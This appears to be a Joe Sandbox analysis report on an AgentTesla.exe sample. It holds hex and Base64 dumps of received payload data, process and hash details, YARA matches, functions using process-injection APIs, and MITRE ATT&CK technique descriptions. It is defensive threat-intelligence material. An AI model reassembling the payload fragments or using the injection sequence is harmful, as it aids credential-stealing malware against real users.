2022-03-14 16:02:12 UTC	305	IN	Data Raw: 4a 76 73 41 41 41 42 68 5a 76 5a 77 41 41 43 67 41 43 62 37 49 41 41 41 59 57 62 32 63 41 41 41 6f 41 41 6d 2b 30 41 41 41 47 46 6d 39 6e 41 41 41 4b 41 41 4a 76 74 67 41 41 42 68 5a 76 5a 77 41 41 43 67 41 43 46 69 68 6e 41 41 41 4b 41 41 49 6f 61 41 41 41 43 67 41 71 41 41 42 4f 4b 77 55 6f 41 61 56 6e 4e 51 4a 37 47 67 41 41 42 44 67 41 41 41 41 41 4b 6a 34 72 42 53 6a 79 72 69 52 72 41 67 4e 39 47 67 41 41 42 43 70 4f 4b 77 55 6f 69 46 56 51 50 67 4a 37 47 77 41 41 42 44 67 41 41 41 41 41 4b 6a 34 72 42 53 68 6a 66 43 68 73 41 67 4e 39 47 77 41 41 42 43 70 4f 4b 77 55 6f 4a 66 73 71 57 51 4a 37 48 41 41 41 42 44 67 41 41 41 41 41 4b 6a 34 72 42 53 69 6a 4e 7a 6c 6f 41 67 4e 39 48 41 41 41 42 43 70 4f 4b 77 55 6f 59 64 52 42 52 77 4a 37 48 51 41 41 42 Data Ascii: JvsAAABhZvZwAACgACb7IAAAYWb2cAAAoAAm+0AAAGFm9nAAAKAAJvtgAABhZvZwAACgACFihnAAAKAAIoaAAACgAqAABOKwUoAaVnNQJ7GgAABDgAAAAAKj4rBSjyriRrAgN9GgAABCpOKwUoiFVQPgJ7GwAABDgAAAAAKj4rBShjfChsAgN9GwAABCpOKwUoJfsqWQJ7HAAABDgAAAAAKj4rBSijNzloAgN9HAAABCpOKwUoYdRBRwJ7HQAAB
2022-03-14 16:02:12 UTC	321	IN	Data Raw: 73 41 41 67 42 34 41 44 73 41 41 51 42 37 41 44 30 41 41 67 42 36 41 44 30 41 41 51 42 39 41 44 38 41 41 67 42 38 41 44 38 41 41 51 42 2f 41 45 45 41 41 67 42 2b 41 45 45 41 41 51 43 42 41 45 4d 41 41 67 43 41 41 45 4d 41 41 51 43 44 41 45 55 41 41 67 43 43 41 45 55 41 41 51 43 46 41 45 63 41 41 67 43 45 41 45 63 41 41 51 43 48 41 45 6b 41 41 67 43 47 41 45 6b 41 41 51 43 4a 41 45 73 41 41 67 43 49 41 45 73 41 41 51 43 4c 41 45 30 41 41 67 43 4b 41 45 30 41 41 51 43 4e 41 45 38 41 41 67 43 4d 41 45 38 41 41 51 43 50 41 46 45 41 41 67 43 4f 41 46 45 41 41 51 43 52 41 46 4d 41 41 67 43 51 41 46 4d 41 41 51 43 54 41 46 55 41 41 67 43 53 41 46 55 41 41 51 43 56 41 46 63 41 41 67 43 55 41 46 63 41 41 51 43 58 41 46 6b 41 41 67 43 57 41 46 6b 41 41 51 43 5a 41 Data Ascii: sAAgB4ADsAAQB7AD0AAgB6AD0AAQB9AD8AAgB8AD8AAQB/AEEAAgB+AEEAAQCBAEMAAgCAAEMAAQCDAEUAAgCCAEUAAQCFAEcAAgCEAEcAAQCHAEkAAgCGAEkAAQCJAEsAAgCIAEsAAQCLAE0AAgCKAE0AAQCNAE8AAgCMAE8AAQCPAFEAAgCOAFEAAQCRAFMAAgCQAFMAAQCTAFUAAgCSAFUAAQCVAFcAAgCUAFcAAQCXAFkAAgCWAFkAAQCZA
2022-03-14 16:02:12 UTC	337	IN	Data Raw: 43 45 41 77 59 52 61 41 4d 47 45 58 41 45 42 68 4b 42 4c 51 51 41 41 51 45 49 44 77 63 46 45 6e 55 53 67 54 45 53 67 54 55 64 45 6f 45 78 43 41 55 67 41 52 4a 31 43 41 59 67 41 42 30 53 67 54 45 47 49 41 45 53 67 54 30 49 43 67 41 43 45 6f 43 74 45 6e 55 53 67 54 55 46 49 41 49 42 48 42 77 46 49 41 41 53 67 53 30 45 49 41 45 42 48 41 6f 67 41 78 4b 41 37 52 77 53 67 50 45 63 42 69 41 42 41 52 4b 41 37 51 49 47 41 67 51 47 45 59 43 63 42 41 59 52 67 4b 41 45 42 68 47 41 70 41 51 47 45 59 43 6f 42 41 59 52 67 4b 77 45 42 68 47 41 73 41 51 47 45 59 43 30 47 41 45 41 43 6b 31 35 56 47 56 74 63 47 78 68 64 47 55 49 4d 54 45 75 4d 43 34 77 4c 6a 41 41 41 41 55 67 41 67 45 4f 44 67 67 42 41 41 45 41 41 41 41 41 41 41 59 67 41 51 45 52 67 55 6b 51 41 51 41 4c 54 Data Ascii: CEAwYRaAMGEXAEBhKBLQQAAQEIDwcFEnUSgTESgTUdEoExCAUgARJ1CAYgAB0SgTEGIAESgT0ICgACEoCtEnUSgTUFIAIBHBwFIAASgS0EIAEBHAogAxKA7RwSgPEcBiABARKA7QIGAgQGEYCcBAYRgKAEBhGApAQGEYCoBAYRgKwEBhGAsAQGEYC0GAEACk15VGVtcGxhdGUIMTEuMC4wLjAAAAUgAgEODggBAAEAAAAAAAYgAQERgUkQAQALT

Statistics

Click to jump to process

Memory Usage

• AgentTesla.exe
• aspnet_compiler.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Behavior

• AgentTesla.exe
• aspnet_compiler.exe

Click to jump to process

Target ID:	0
Start time:	17:02:01
Start date:	14/03/2022
Path:	C:\Users\user\Desktop\AgentTesla.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AgentTesla.exe"
Imagebase:	0x1310000
File size:	7255264 bytes
MD5 hash:	81448798CCA71E2B8BCE354AFCF098B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	17:02:13
Start date:	14/03/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x360000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Show Legend

Hide Nodes/Edges

Executed Functions

Function 011484B0 Relevance: .4, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169c38ae88948f9af22aa668aa0feea87812363d7dbca2d07b5bce53fcd48f1f
Instruction ID: d84f1589cab2534738907ca4a9cdebdfe59d9357d55dc27c059778ce280d35de
Opcode Fuzzy Hash: 169c38ae88948f9af22aa668aa0feea87812363d7dbca2d07b5bce53fcd48f1f
Instruction Fuzzy Hash: ABF13D78E002198FDB58DFA4C891BADB7B6BF88314F54C069DA09AB341DB745E84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01140417 Relevance: .2, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866a3905b79e8d1f150573e8f9b4351432a8a0ca17f77706b623f452426593a9
Instruction ID: 923649dc5c3db3d92293e209400965df7a552ce412145191760d37dca129f0d6
Opcode Fuzzy Hash: 866a3905b79e8d1f150573e8f9b4351432a8a0ca17f77706b623f452426593a9
Instruction Fuzzy Hash: DA81E474D04258CFDB18CFAAD8446EDBBB6BF89300F14C0AAE909A7356DB385985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01140448 Relevance: .2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b0e6ed145816e109c49cd62dcd8f302cd5ad49c9c1caa7e7163bca1c5a1412
Instruction ID: 381cb5068dd4f06a57ad530a83ea089ca7053f89092f5450c664d06cce840987
Opcode Fuzzy Hash: a3b0e6ed145816e109c49cd62dcd8f302cd5ad49c9c1caa7e7163bca1c5a1412
Instruction Fuzzy Hash: CF71C374E04618CFEB18CFAAD844AEDBBB6BF89300F14C069E909A7355DB385985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0114A758 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0114AA1F

Strings

^(VI, xrefs: 0114A793
^(VI, xrefs: 0114A7C2

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID: CreateProcess
String ID: ^(VI$^(VI
API String ID: 963392458-3564410219
Opcode ID: 4daa5bb4dfaef2d2c89456182fe2cc5f723817e91b1265366fc2acdb3c0530d1
Instruction ID: 0b56b6356a5a5ce5dfe31bf139cbe31fb8e91d7cf3d4c9c54d4d6083dc7d1228
Opcode Fuzzy Hash: 4daa5bb4dfaef2d2c89456182fe2cc5f723817e91b1265366fc2acdb3c0530d1
Instruction Fuzzy Hash: BBC11371D4022D8FDB24CFA8D840BEEBBB1BF49304F0595A9D54AB7240EB749A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0114B4A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0114B54A

Strings

^(VI, xrefs: 0114B4BA

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID: AllocVirtual
String ID: ^(VI
API String ID: 4275171209-3744052019
Opcode ID: 722c618608cca07ba0c287cf989ec658eb512d5daa68687d3f9df1c8ffa368b3
Instruction ID: 2ba6edbe45f259d854e3c84f10ab3ad5c04c5deb4d58f1d8a51e9d4d77b1736a
Opcode Fuzzy Hash: 722c618608cca07ba0c287cf989ec658eb512d5daa68687d3f9df1c8ffa368b3
Instruction Fuzzy Hash: B031AAB4D042589FCF14CFA9D880ADEFBB1BB49314F10902AE914BB310D735A906CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0114ABE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetThreadContext.KERNEL32(?,?), ref: 0114AC97

Strings

^(VI, xrefs: 0114AC07

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID: ContextThread
String ID: ^(VI
API String ID: 1591575202-3744052019
Opcode ID: b1a62fc8b83950ed916001a3ef2c025bd8e029561983e91f69b9a57949e960b2
Instruction ID: 729e64b56bc3ee4f3e6fa794af5c27d35a3ad69fbe64a043614bdfa8189c50d2
Opcode Fuzzy Hash: b1a62fc8b83950ed916001a3ef2c025bd8e029561983e91f69b9a57949e960b2
Instruction Fuzzy Hash: C131CBB4D002589FDB14CFA9D884AEEFBF1BF49314F14802AE419B7240D738A949CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011408A8 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d077811c0690be69fec38bca371fd253b1880629351e8bac938dccc580a50f
Instruction ID: 1764971ae7b5b7024ca3d36d9abdef78000ebdeb4aac1ebb5478d6d6f2f9ff4b
Opcode Fuzzy Hash: 72d077811c0690be69fec38bca371fd253b1880629351e8bac938dccc580a50f
Instruction Fuzzy Hash: 36717C70E012489FDB18DFBAE845A9EBBF3FB88344F04C52AD104EB229EB7559058B41

Uniqueness

Uniqueness Score: -1.00%

Function 011408B8 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42afd22c1f20d1bf746f7fd45190f64e7298f3ea402a710a9b38c416946a173b
Instruction ID: 2b498fa86257fde341e964dd040e44876ecd062717faa45b7a0915f95b747d10
Opcode Fuzzy Hash: 42afd22c1f20d1bf746f7fd45190f64e7298f3ea402a710a9b38c416946a173b
Instruction Fuzzy Hash: 64615D70E012889FDB18DFBAE444A9EBBF3FB88344F04C42AD104EB669EB7559058F51

Uniqueness

Uniqueness Score: -1.00%

Function 01140B58 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6fb112011d919262ed15b394c5ca7b9f019564696fd0bf47fd6996227db2fd0
Instruction ID: 0eeba02300cf4f12912d9b3ad3eca1ec5afad89e44e775773604851e8a7bdbad
Opcode Fuzzy Hash: c6fb112011d919262ed15b394c5ca7b9f019564696fd0bf47fd6996227db2fd0
Instruction Fuzzy Hash: 67413F71E016198BEB5CCF6BCD4079AFAF7AFC9300F14C1BA951CA6254DB7505958F01

Uniqueness

Uniqueness Score: -1.00%

Function 01140B49 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe9db2163176b5680b0cc06badf18e98bb2ca2f6ab4debcd541cc9828d445586
Instruction ID: 69a7a0e12269a424c74ab4dbf5ace11c7d382d1d27d487a782fe9be3820ec747
Opcode Fuzzy Hash: fe9db2163176b5680b0cc06badf18e98bb2ca2f6ab4debcd541cc9828d445586
Instruction Fuzzy Hash: E1414271E016199BEB6CCF6BCD4069EFAF3AFC9310F14C1BA945CA6224EB3505568F41

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AgentTesla.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\mntemp

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AgentTesla.exe.log

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
AgentTesla.exe